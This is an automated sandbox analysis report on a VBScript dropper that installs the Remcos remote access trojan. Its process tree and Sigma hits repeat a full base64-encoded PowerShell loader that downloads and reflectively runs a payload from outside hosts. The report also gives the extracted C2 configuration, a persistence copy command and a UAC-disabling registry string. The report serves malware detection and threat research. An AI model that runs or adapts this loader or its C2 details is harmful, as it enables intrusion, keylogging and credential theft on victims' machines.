Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aktarma,pdf.vbs

Overview

General Information

Sample name:Aktarma,pdf.vbs
Analysis ID:1571703
MD5:8c5cf018a9128cb2a9267ee3c4183a0c
SHA1:c0e11113ae0360e55302ceecbc7a356ed732ca18
SHA256:d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 524 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • wscript.exe (PID: 7648 cmdline: wscript.exe C:\ProgramData\classers.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • svchost.exe (PID: 8064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.MSBuild.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                15.2.MSBuild.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  15.2.MSBuild.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    15.2.MSBuild.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    15.2.MSBuild.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64e04:$str_b2: Executing file:
                    • 0x65c3c:$str_b3: GetDirectListeningPort
                    • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65780:$str_b7: \update.vbs
                    • 0x64e2c:$str_b9: Downloaded file:
                    • 0x64e18:$str_b10: Downloading file:
                    • 0x64ebc:$str_b12: Failed to upload file:
                    • 0x65c04:$str_b13: StartForward
                    • 0x65c24:$str_b14: StopForward
                    • 0x656d8:$str_b15: fso.DeleteFile "
                    • 0x6566c:$str_b16: On Error Resume Next
                    • 0x65708:$str_b17: fso.DeleteFolder "
                    • 0x64eac:$str_b18: Uploaded file:
                    • 0x64e6c:$str_b19: Unable to delete:
                    • 0x656a0:$str_b20: while fso.FileExists("
                    • 0x65349:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 7 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_2020.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_2020.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Base64 Encoded PowerShell Command Detected
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxl
                        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxl
                        Sigma detected: Silenttrinity Stager Msbuild Activity
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49790
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", ProcessId: 524, ProcessName: wscript.exe
                        Sigma detected: Suspicious Copy From or To System Directory
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2020, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", ProcessId: 7520, ProcessName: cmd.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", ProcessId: 524, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
